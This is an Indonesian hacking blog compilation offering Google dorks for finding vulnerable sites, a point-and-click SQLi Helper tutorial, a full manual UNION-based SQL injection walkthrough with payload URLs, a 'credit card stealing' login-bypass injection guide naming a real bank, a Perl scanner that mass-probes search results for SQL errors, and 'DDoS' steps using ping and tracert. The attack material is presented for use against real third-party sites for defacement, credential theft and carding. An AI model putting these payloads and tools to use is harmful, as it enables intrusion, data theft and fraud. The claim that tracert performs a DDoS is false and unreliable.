Mungkin Hanya ini saja yang bisa saya pos.. lebih dan kurang saya minta maaf.
semoga postingan saya kali ini bermanfaat,
tapi jangan lupa jempolnya Gan.. hehehe.. :)

Tutorial cara Pencarian Hacker Di Google

1. Mencari FTP Server yang isinya buku gratis
script (note:Lakukan Di Kotak Cari Google ):
index.of <spasi> intitle:<ga pake spasi>hacking <spasi> books

2. Mencari kata hacking di URL
script (note:Lakukan Di Kotak Cari Google ):
allinurl:<ga pake spasi>"hacking"

3. Mencari Nama seseorang di seluruh Web
script (note:Lakukan Di Kotak Cari Google ):
allintext:<ga pake spasi>"nama orang yang dicari"

4. Mencari Dua tema yang berkaitan
script (note:Lakukan Di Kotak Cari Google ):
"HACKING"<spasi> &&<spasi>"FACEBOOK"

5. Mencari url untuk SQL INjection
script (note:Lakukan Di Kotak Cari Google ):
inurl:<ga pake spasi>*.php/id=
atau
inurl:".php/id="

Ok, Sekian dari saya, mudah-mudahan yang sedikit ini bermanfaat buat agan- agan sekalian.

Tutorial Hacking Mengunakan SQLI Helper v.2.7

     Cybervirburg32 kali ini mau posting tutorial hacking mengunakan SQLI Helper v.2.7..
kayaknya udahhh pada tau'kan apa itu SQLI Helper, itu lohh tools buat hacking website.pokoknya banyak dech kegunaanya.OK Br0 lanjutt aja ke TKP.. ikuti tutorial'a sampai habis.. :)

1. Download terlebih tools SQLI Helper v.2.7 disini

2. Cari target web yang akan di deface disini

3. Setelah menemukan target yang vuln menggunakan dork, kita buka tools SQLI Helper'nya.

Berikut tampilan toolsnya

4. Nah, masukkan url target ke kolom "target" lalu klik "inject"

5. Tunggu prosesnya selesai. Ini memakan waktu sekitar 5-10 menit (lihat bagian bawah tools)

6. Jika sudah, maka akan muncul informasi mengenai target di kolom "host information. Anda klik 1x pada "current database" di kolom "host information" lalu klik "get database"

7. Nanti akan muncul database target di kolom "database name". Anda klik 1x databasenya (selain information schema) lalu klik "Get tables"

8. Jika sudah, akan terdapat beberapa tables yang muncul pada kolom "table name". Anda harus mengira - ngira kira - kira ada dimana username dan password admin web target. Jika anda sudah merasa menemukan table yang berisikan username dan password, anda klik 1x pada table itu lalu klik "Get columns"

9. Nah, bakalan muncul column yang berisikan username dan password target di kolom "column name". Anda klik 1x pada column yang berisikan username dan column yang berisikan password, kemudian klik "Dump now"

10. Taadaa... Anda sudah menemukan username dan password target. Anda crack terlebih dahulu disini

11. Jika username dan password yang berbentuk MD5 tadi sudah anda crack, anda tinggal cari admin page web tersebut.

Semoga sukses ^_^

Cara Mengecek Web yang Down dengan Command Prompt

      Dalam melakukan aksi DDoS, tidak lengkap rasanya tanpa menggunakan Command Prompt. Biasanya Command Prompt digunakan untuk mengecek target DDoS sudah lumpuh atau belum.

   

 

Untuk itulah kali ini saya akan share cara untuk mengecek web yang down dengan command prompt.

1.  Buka cmd dgn cara tekan windows + r > ketik cmd > enter

2. Ketikkan perintah berikut :

 

ping www.target.com -t

3. Kalian bisa ganti www.target.com dengan link web yang di DDoS

4. Tekan enter

5. Kini proses ping berjalan, jika terdapat tulisan "reply from bla..bla..bla..bla.." itu menandakan web masih up, tapi jika tulisan "request time out" muncul berkali-berkali itu menandakan web sudah down.

Ini contohnya

DDos mengunakan CMD

      Nah. Setelah Cybervirburg32 share cara ddos dengan notepad beberapa hari yang lalu, Kali ini Cybervirburg32 akan tunjukkan lagi cara DDoS menggunakan command prompt (cmd). Ya meskipun ini cara lama yang penting sharing :D Ok simak baik - baik.

1. Buka cmd, caranya start -> run -> ketik cmd -> enter

2. Ketik tracert www.target.com
    ganti www.target.com dengan link situs target anda

3. Tekan "enter"

4. Proses DDoS kini sedang berjalan. Silahkan tunggu beberapa jam hingga target down sambil minum kopi :D. Jika laporan mengalami request time out berulang kali brarti target bisa dikatakan mulai down.

Screenshot contoh

 

DDOS CMD

Selamat mencoba.. :)

All Dork google

Kali ini Cybervirburg32 mau share kumpulan Dork buat Deface web..

tp sebelumnya udah pada tau'kan apa itu Dork..!!!

oke dari pada panjang lebar, mending langsung aja ke TKP...

trainers.php?id=
article.php?ID=
play_old.php?id=
declaration_more.php?decl_id=
Pageid=
games.php?id=
newsDetail.php?id=
staff_id=
historialeer.php?num=
product-item.php?id=
news_view.php?id=
humor.php?id=
communique_detail.php?id=
sem.php3?id=
opinions.php?id=
spr.php?id=
pages.php?id=
chappies.php?id=
prod_detail.php?id=
viewphoto.php?id=
view.php?id=
website.php?id=
hosting_info.php?id=
gery.php?id=
detail.php?ID=
publications.php?id=
Productinfo.php?id=
releases.php?id=
ray.php?id=
produit.php?id=
pop.php?id=
shopping.php?id=
productdetail.php?id=
post.php?id=
section.php?id=
theme.php?id=
page.php?id=
shredder-categories.php?id=
product_ranges_view.php?ID=
shop_category.php?id=
channel_id=
newsid=
news_display.php?getid=
ages.php?id=
clanek.php4?id=
review.php?id=
iniziativa.php?in=
curriculum.php?id=
labels.php?id=
look.php?ID=
galeri_info.php?l=
tekst.php?idt=
newscat.php?id=
newsticker_info.php?idn=
rubrika.php?idr=
offer.php?idf=
index.php?id=
buy.php?category=
article.php?ID=
play_old.php?id=
newsitem.php?num=
top10.php?cat=
historialeer.php?num=
reagir.php?num=
Stray-Questions-View.php?num=
forum_bds.php?num=
game.php?id=
view_product.php?id=
sw_comment.php?id=
news.php?id=
avd_start.php?avd=
event.php?id=
sql.php?id=
news_view.php?id=
select_biblio.php?id=
humor.php?id=
ogl_inet.php?ogl_id=
fiche_spectacle.php?id=
communique_detail.php?id=
sem.php3?id=
kategorie.php4?id=
faq2.php?id=
show_an.php?id=
preview.php?id=
loadpsb.php?id=
opinions.php?id=
spr.php?id=
announce.php?id=
participant.php?id=
download.php?id=
main.php?id=
review.php?id=
chappies.php?id=
read.php?id=
prod_detail.php?id=
article.php?id=
person.php?id=
productinfo.php?id=
showimg.php?id=
view.php?id=
website.php?id=
hosting_info.php?id=
gery.php?id=
rub.php?idr=
view_faq.php?id=
artikelinfo.php?id=
detail.php?ID=
index.php?=
profile_view.php?id=
category.php?id=
publications.php?id=
fellows.php?id=
downloads_info.php?id=
prod_info.php?id=
shop.php?do=part&id=
collectionitem.php?id=
band_info.php?id=
product.php?id=
releases.php?id=
ray.php?id=
produit.php?id=
pop.php?id=
shopping.php?id=
productdetail.php?id=
post.php?id=
viewshowdetail.php?id=
clubpage.php?id=
memberInfo.php?id=
section.php?id=
theme.php?id=
page.php?id=
shredder-categories.php?id=
tradeCategory.php?id=
product_ranges_view.php?ID=
shop_category.php?id=
transcript.php?id=
channel_id=
item_id=
newsid=
trainers.php?id=
news-full.php?id=
news_display.php?getid=
index2.php?option=
readnews.php?id=
newsone.php?id=
product-item.php?id=
pages.php?id=
clanek.php4?id=
viewapp.php?id=
viewphoto.php?id=
galeri_info.php?l=
iniziativa.php?in=
curriculum.php?id=
labels.php?id=
story.php?id=
look.php?ID=
aboutbook.php?id=

nie yang paling lengkap bos di sini

nahhhh... dari Dork yg di atasss mungkin sangatt cukup untuk agan-agan berkarya.
moga postingan Cybervirburg32 ini bermanfaat buat agan-agan sekalian..
selamattt mencoba.. :)

Cara Deface Web Dengan SQL

     

1. Anda cari target web untuk di di deface menggunakan dork. Bisa anda cari disini

2. Ketikkan dork itu di kotak pencarian google, maka akan muncul banyak web di hasil pencarian. Silahkan anda buka salah satu

3. Tambahkan karakter ' pada akhir url'nya untuk mengetahui vulnerability'nya
Contoh : www.site.com/news.php?id=32'

4. Jika muncul tulisan seperti "syntax error" berarti web tersebut vuln alias bisa kita deface
Contoh errornya : warning: mysql_fetch_array(): supplied argument is not a valid MYSQL result resource in D:\inetpub\wwwroot\ajpower.net\html\news.php on line

5. Sekarangnya saatnya kita beraksi. Cari jumlah table yang ada pada database web tersebut dengan cara menambahkan karakter +order+by+1-- di belakang url
Contoh : www.site.com/news.php?id=32+order+by+1--

Anda coba satu persatu hingga muncul tulisan error.
Contoh : www.site.com/news.php?id=32+order+by+2--
www.site.com/news.php?id=32+order+by+3--
www.site.com/news.php?id=32+order+by+4--
Saya memisalkan jumlah table web ada 4 (errornya di 4)

6. Kemudian kita gunakan perintah union untuk mengeluarkan nomor yang nantinya kita gunakan. Tambahkan +union+select+1,2,3,4--
Contoh : www.site.com/news.php?id=32+union+select+1,2,3,4--
Saya memisalkan angka 3 yang keluar

7. Sekarang masukkan version() pada angka 3 untuk memaparkan version
Contoh : www.site.com/news.php?id=32+union+select+1,2,version(),4--

8. Kita munculkan nama - nama table yang ada pada web tersebut dengan memasukkan perintah table_name pada angka 3 dan perintah +from+information_schema.tables-- dibelakang url
Contoh : www.site.com/news.php?id=32+union+select+1,2,table_name,4+from+information_schema.tables--
Nantinya kita akan melihat nama nama table yang ada pada web

9. Kita lihat isi yang ada di dalam table tersebut dengan memasukkan perintah group_concat(table_name) pada angka 3 dan perintah +where+table_schema=database()-- di akhir url
Contoh : www.site.com/news.php?id=32+union+select+1,2,group_concat(table_name),4+from+information_schema.tables+where+table_schema=database()--

10. Selanjutnya kita keluarkan isi yang ada di table tersebut (column) dengan memasukkan perintah group_concat(column_name) pada angka 3 dan +from+information_schema.columns+where+table_name=0xHasilConvertTextTableAdmin-- di akhir url
Untuk langkah ke 10 ini silahkan anda convert terlebih dahulu text nama table'nya ke hexadecimal disini
Jadi misalkan nama table'nya tadi admin maka jika di convert akan menjadi 61646D696E
Contoh : www.site.com/news.php?id=32+union+select+1,2,group_concat(column_name),4+from+information_schema.columns+where+table_name=0x61646D696E--
Nanti akan muncul column yang berisikan username dan password

11. Lalu kita lihat isi dari column yang kita temukan. Saya misalkan nama tablenya adalah admin, dan isi dari table admin adalah column username & password. Maka masukkan perintah concat_ws(0x3a,"nama column yang ada di dalam table admin") pada angka 3 dan perintah +from+Admin-- di akhir url
Contoh :  www.site.com/news.php?id=32+union+select+1,2,concat_ws(0x3a,"username,password"),4+from+Admin--

12. Maka kita akan melihat username dan password admin dari web tersebut. Saatnya kita eksekusi.

13. Cari admin pagenya, biasanya dengan menambahkan tulisan berikut di akhir url web target.
/admin/ , /administrator/ , /webadmin/ , /adm/ , /webbase/
Contoh : www.site.com/admin/
Nah isikan username dan password yang tadi di dapat. Jika password berbentuk MD5 seperti e10adc3949ba59abbe56e057f20f883e, anda crack dulu disini

Memang tidaklah semudah membalik telapak tangan, belajarlah sedikit sedikit.

Banyak cara yang dapat dilakukan untuk deface sebuah web, salah satunya yaitu dengan teknik SQL Injection. Banyak sekali para hacker/defacer yang menggunakan cara ini. Dan saya akan menunjukkan langkah - langkahnya.

Cara mencuri kartu credit

  

hm...!!Sebelum nya maaf kan penulis kalau judul nya cenderung untuk berniat jahat.tapi jangan salah...!!justru setelah membaca tulisan yang singkat ini mampu membuat para perusahaan memiliki security yang benar-benar bisa di andalkannach...!!kita mulai untuk mengetahui aksi-aksi para carder.sebenar nya tak perlu mempunyai banyak ilmu mengenai IT(Internet Technology)cukup sering browsing/surfing.berikut akan saya ulas sedikit aksi dari para carder. SQL(Simple Query Laguage)tau gak apa SQL ini?kalo lom tau nach...cari tau dulu dech. untuk mencari perusahaan yang ingin kita kuras database/isi-isi dan termasuk kartu kredit para pelanggan nya.Caranya:gunakan search engine.yang saat ini paling populer yaitu GOOGLE.ketikan nama perusahaan yang akan di tuju.contoh nya:http//:www.bankbri.co.id.maka tambahkan di akhirnya kata-kata ADMIN/ASP Aatau PHP. EH TAU GAK??HTTP-WWW-PHP-ASP???DUH..GIMANA MO JADI HACKER KALO KEPANJANGAN ITU AJA GAK TAU.ININIH KEPANJANGAN NYA.ARTINYA CARI SENDIRI... HTTP=HYPER TEXT TRANSPER PROTOCOL WWW=WORD WIDE WEB PHP=HYPER TEXT PREPROCESSOR ASP=ACTIVE SERVER PAGE Naah...!!kalo udah tau kepanjangan nya.khan enak...!! kita lanjut pembahasan kita kali ini.tadi kan dah di contoh kan bankmandiri.co.id yang akan di kuras.ketikkan di ujung nya tambahan admin.asp ato php.maka secara otomatis akan dipinta username dan password nya. naah..tugas kita adalah mencari username dan pasword nya.gimana caranya bang??kita pura-pura tau aja dengan memasukkan dibagian username+password.eeh sebelum nya.tau gak???kalo pesan error itu memberi arahan untuk mencari username nya.nah...gini cara-caranya.ada lima caranya ketikkan dibagian username:

1. '; drop table user--(-;=dinamakan: single line comment,gunanya apa?gunanya agar tidak terjadi error pada saat dijalankan
2. pada bagian username: admin'--
3. ------------^^------------------: 'or 1=1-
4. ------------^^------------------: 'union select 1, 'fictional_user' . 'some_password' . 1--
5. atau dengan sengaja mengisi bidang username salah untuk mendapat kan pesan error yang ditampilkan(error message)gunanya melacak dari pesan tadi.jangan salah lho.....pesan error ternyata ada fungsinya. ketikkan saja: 'having 1=1- -

maka pesan yang akan muncul sebagai berikut:
[Microsoft ODBC SQL SERVER DRIVE] [SQL SERVER] colomn 'USER.id is invalid in the select list because it not contained in an aggregate function and there is no group by clause/ proces_login.asp,line 35
 

nah....!! sekarang kita tau.kalau pesan error nya bilang begitu berarti dia pake  'user.id.maka kembali ketikkan ulang di username: 'grup by user.id having 1=1- -
maka otomatis akan muncul pesan error lagi sama seperti di atas cuma ada perubahan pada bagian stelah colomn ='user.username'
naaah..!!kita dapat lagi.maka kita susul lagi dengan mengisikan pada username,sekali ini kita cek password nya.dia pake password ato gak.
ketikkan di username: 'group by user.id, user.username.password,user.privs having 1=1- -
jika memungkin kan tidak terjadi error maka tabel user mamang bener ada password nya.maka kita coba lagi isi di bidang username: 'union select sum(username)from user- -
tau gak?? sum=yang terdapat angka metematis/integer.seperti 1234 sampe 9.jika error berarti username brtype varchar.apalagi tuh varchar bang??varchar=huruf yang tidak memiliki nilai matematis.dari A ampe Z.lah..kalo bener dia pake varchar maka akan muncul pesan error. koq errror terus seeh??karna emang kita khan mencari username+passwrd dari pesan errornah...!!!kita lanjut.sekarang pesan error nya begini:
MICROSOFT OLE DB Provider for ODBC driver error'8004e07'
[MICROSOFT] [ODBC SQL SERVER DRIVER] [SQL SERVER]
The sum or average aggregate operation cannot take a varchar data type as an argument
/process_login.asp,line 35

maka kita isi lagi: 'unio select
pesan error nya kurang lebih berbunyi:
@@version,1,1,1- -
Microsoft OLEDB,PROVIDER FOR ODBC DRIVER ERROR ' 8004E07 ' [MICROSOFT] [ODBC SQL Server Driver] [SQL Server]
syntax error convertingthe nvachar value
' microsoft SQL Server 2000-8.00.194(intelx86)aug 6 2000 00:57:48 Copy right (c)1988-2000 microsoft corporation enterprice edition on windows NT 5.0(build 2195:server pack 2) to 2 column of data type int.
/process_login.asp,line 35

nah....!! selanjut nya atas perintah pesan tadi kita mengkonversi konstanta @@version kedalam bentuk integer
username: 'union select min(username),1,1,1 from user where username> 'a' - -
maka akan muncul error message:
microsoft OLE DB provider for ODBC dRIVER ERROR '8840e07'
[microsoft] [odbc sql server driver] [sql server]syntax error converting the varchar value 'ADMIN' to a column of data type int.
/process_login.asp,line 35

nah....!! ada account admin.maka tugas kita gali lagee...
username: 'union select min(username),1,1,1 from user where username> ' admin ' - -

maka akan muncul pesan error
microsoft OLE DB Provider for ODBC driver error ' 80040e07'
[microsoft] [ODBCSQL SERVER DRIVER] syntax error converting the varchar value ' roger ' to a column of data type int.
/process_login.asp,line 35

oke.....!!sekarang kita dapet username dengan nama : roger sekarang kita cari password nya,untuk pengguna roger :
username= ' union select password,1,1,1from user where username= ' admin ' - -  

maka akan muncul pesan error.yang berbunyi........misal:
microsoft OLEDB Provider for ODBC driver error '8004e07'
[microsoft] [ODBC SQL SERVER DRIVER] syntax error converting the varchar value ' bryan 200' to a column of data type
/process_login.asp,line 35

DAPAT......!!!KALAU UDAH BEGINI MAU APA LAGI?? TERSERAH LOE DECH...mau ngapain aja loe suka-suka ati kau lah.mau di acak-acak tuch database nya.tapi...jangan lupa.berhubung judul kita kali ini CARDING(PEMBOBOL KARTU KREDIT)Nah...musti kartu kredit pelanggan yang di cari.....
nah...untuk kali ini udah dulu dech....ampe sini aja doeloe.eiiit...tapi masih ada lagi yang harus kamu ketahui.yaitu setelah dapet kartu kredit kira-kira tuch kartu masih valid gak 
ya???jangan-jangan tuch kartu dah abis masa berlakunya cemen dech jadinya....hehehe.jadi gimana caranya bang??cara menguji validitas kartu kredit bisa dibaca di: lanjutan carding/pembobol kartu kredit.
  nahh..kalo udah dapet tuh kartu kredit yang asli...jangan coba-coba asal maen beli.sembunyikan identitas doeloe..caranya bang???pokok nya baca aja di judul itu dech....dijamin gak nyessel.
selamat mencoba

Situs Hacker Indonesia

    Berikut ini adalah list daftar situs hacker Indonesia / daftar situs hacking Indonesia / daftar web hacker Indonesia / daftar web hacking Indonesia / daftar website hacker indonesia / daftar website hacking Indonesia / daftar situs cracker Indonesia / daftar situs cracking Indonesia / daftar web cracker Indonesia / daftar web cracking Indonesia / daftar website cracker indonesia / daftar website cracking Indonesia.
Berikut adalah List Situs Hacker Indonesia:

1. www.binushacker.net
2. www.jasakom.com
3. www.echo.or.id
4. www.kecoak.org
5. www.devilzc0de.org
6. www.spyrozone.net
7. www.yogyacarderlink.web.id
8. www.nyit-nyit.net
9. www.indonesianhacker.or.id
10. www.muslimhacker.net
11. www.sekuritionline.net
12. www.exploit-id.com
13. www.surabayahackerlink.org
14. www.xcode.or.id
15. www.hacker-newbie.org

Berikut ini adalah daftar website hacker luar negeri / List site hacker / list site hacking / list web hacker / list web hacking / list website hacker / list website hacking / list site cracker / list site cracking / list web cracker / list web cracking / list website cracker / list website cracking around the world.
Tambahan List Situs Hacker Luar Negeri:

1. www.packetstormsecurity.org
2. www.phrack.org
3. www.blackhat.com
4. www.hackforums.net
5. www.hackinthebox.org
6. www.securityxploded.com
7. www.hackaday.com
8. www.darknet.org.uk
9. www.securiteam.com
10. www.seclist.org
11. www.metasploit.com
12. www.backtrack-linux.org
13. www.secmaniac.com
14. www.irongeek.com
15. www.hak5.org

Sebenernya masih banyak lagi yang lainnya, cuman ya cukup sampai situ aja ya listnya. Yang lain bisa dicari sendiri referensinya
Semoga bermanfaat, selamat menimba ilmu..

Tools Hacker

Tool apa saja yang biasa di pakai seorang hacker ? Ada banyak tool dari berbagai situs "hackX0r" di internet, bagaimana kita mengetahui apa yang kita perlukan dan mana yang tidak? Baiklah, pada posting ini akan coba dijelaskan beberapa tool dasar yang seringkali hacker gunakan. Namun perlu di ketahui bahwa tidak semua hacker memerlukan atau menggunakan tool-tool ini, tapi kebanyakan sich begitu.
Daftar tool yang tertulis disini tidaklah lengkap, dan setiap hari ada saja program baru yang dirilis oleh hacker, jadi hanya dasar-dasarnya.

-------------------------------------------------------------------------------------------------

CATATAN: Jangan mendownload program apapun dari website hacking yang di host angelfire, geocities , tripod atau warez. Mengapa? karena besar kemungkinan berisikan trojan, worm, virus dan berbagai kode jahat lainnya. Saya sarankan untuk mendownload program tersebut melalui website www.packetstromsecurity.org

-------------------------------------------------------------------------------------------------

Berikut ini tool yang umum digunakan oleh hacker:

PORT SCANNER
melakukan scanning target untuk melihat port mana saja yang terbuka.

LANGUAGE INTERPRETER atau COMPILER
Melakukan kompilasi script dan program.

CGI VULN SCANNER
melakukan scanning untuk melihat celah keamanan cgi.

EXPLOIT
mencoba memperoleh akses sebagai superuser pada suatu sistem.

ROOTKIT
agar tetap hidden dan membuat 'backdoor' agar mudah mengakses sistem tersebut nantinya.

TROJAN
mendapatkan akses ke suatu sistem sekedar mengeksploitasi user yang rada-rada bodoh ... hehehe.

SNIFFER
mengumpulkan data dari suatu jaringan komputer.

BRUTE FORCER
mencoba berbagai kombinasi karakter hingga mendapatkan password yang sebenarnya.

WINGATE SCANNER
Scan terhadap ip dan memeriksa apakah ada WinGate yang terinstall

GDB
gnu debugger untuk mempelajari lebih dalam tentang bagaimana program tersebut bekerja.

GCC
gnu c compiler untuk kompilasi program C dan menjadikannya program tersebut lebih mudah dipahami dan digunakan.

Kira-kira demikian yang dapat disampaikan, ini hanyalah daftar umum dan tidaklah lengkap. Sekali kita memiliki tool ini kita dapat bergerak ke tingkat lanjut. Hanya saja, jangan mencoba seluruh program sejenis "NUkeR-2k" atau berbagai program yang ditawarkan melalui berbagai website yang tidak resmi dan kurang terkenal hanya karena ingin tampil beda. Buang-buang waktu saja!

Dan sekali lagi, tulisan ini pernah saya baca dan saya posting ulang hanya dengan satu tujuan yaitu Pengetahuan saja, untuk lebih detail cara penggunaanya silahkan mencoba

SQL Injection Scanner [perl]

yeah, g'd evening
Share tools lagi nih, kemarin gw share tools  SQL Injection scanner yg di tuliskan menggunakan bahasa PHP.
Dan sekarang mari kita coba scanner yang lebih keren lagi, scanner ini ditulis menggunakan bahasa Perl (wiw)
Check the source

#!/usr/bin/perl
# .:. .:. .:. .:. .:. .:. .:. .:. .:. .:. .:. .:.
# .:. Script : SQLi Vulnerable Scanner        .:.
# .:. Version : 3.0 fixed (06/10/2012)        .:.
# .:. Author : Metropolis                     .:.
# .:. .:. .:. .:. .:. .:. .:. .:. .:. .:. .:. .:.
# .:. MySQL Injection                         .:.
# .:. MSAccess Injection                      .:.
# .:. MSSQL Injection                         .:.
# .:. Oracle Injection                        .:.
# .:. Blind Injection                         .:.
# .:. .:. .:. .:. .:. .:. .:. .:. .:. .:. .:. .:.
#  Useless version :
#  http://pastebin.com/kKxCCJuU 1.0
#  http://pastebin.com/FyPcTLRw 2.0
use LWP::UserAgent;
use Getopt::Std;

getopt('kpo', \%opts);
if($opts{'k'} eq '')
{
print "[Help] SQLi.pl -k shopping.php?id= -p 500\n"; # Max: 50,100,500,700,etc...
}
if($opts{'p'} eq '')
{
    $opts{'p'} = 1;
}

print <<"Metropolis_intro";


    ___________
   |.---------.|
   ||      ||
   || 5c4nn3r ||   SQL injection attack!
   ||         ||    Break the system!
   |'---------'|
    `)__ ____('    
    [=== -- o ]
  __'---------'__
[::::::::::: :::]
[:::::::::::::::]
Metropolis_intro
system('COLOR A');
print "\n\n";
print "h4x0ring ...\n";
print "--------------------------\n\n";


for($start = 0;$start != $opts{'p'}*10;$start += 10)
{
    $t = "http://www.google.co.id/search?hl=fr&q=".$opts{'k'}."&btnG=Search&start=".$start;
    $ua = LWP::UserAgent->new;
    $ua->timeout(10);
    $ua->env_proxy;
    $ua->agent("Mozilla/5.0 (Windows; U; Windows NT 5.1; tr; rv:1.9.2.12) Gecko/20101026 Firefox/3.6.12 ( .NET CLR 3.5.30729; .NET4.0E");
    $response = $ua->get($t);
    if ($response->is_success)
    {
        $c = $response->content;
        @stuff = split(/<a href=/,$c);
        foreach $line(@stuff)
        {
            if($line =~/(.*) class=l/ig)
            {
                $out = $1;
                $out =~ s/"//g;
      $out =~s/$/\'/;
         
    $ua = LWP::UserAgent->new;
    $ua->timeout(10);
    $ua->env_proxy;
    $response = $ua->get($out);
            $error = $response->content();
            if($error =~m/SQL syntax/)
                {print "$out Vulnerable MySQL!\n";}
             
            elsif($error =~m/Microsoft JET Database/ || $error =~m/ODBC Microsoft Access Driver/)
                {print "$out Vulnerable MS Access!\n";}
             
            elsif($error =~m/Microsoft OLE DB Provider for SQL Server/ || $error =~m/Unclosed quotation mark/)
                {print "$out Vulnerable MSSQL!\n";}
         
            elsif($error =~m/mysql_fetch_array()/ || $error =~m/mysql_num_rows()/)
                {print "$out Vulnerable Blind Possible!\n";}
             
            elsif($error =~m/Microsoft OLE DB Provider for Oracle/)
                {print "$out Vulnerable Oracle!\n";}
             
            }
        }
        }
        }

Jangan lupa save dengan ekstensi .pl (contoh: sql.pl)
Jangan lupa juga, ente harus udah install perl (kalo OS windows, coba install Active Perl, kalo Linux sih udah ada )
Scannernya ampuh juga kok :)
Buat jalanin programnya

perl namafile.pl -k <dork> -p <page>

contoh :

perl sql.pl -k inurl:gallery.php?id= -p 100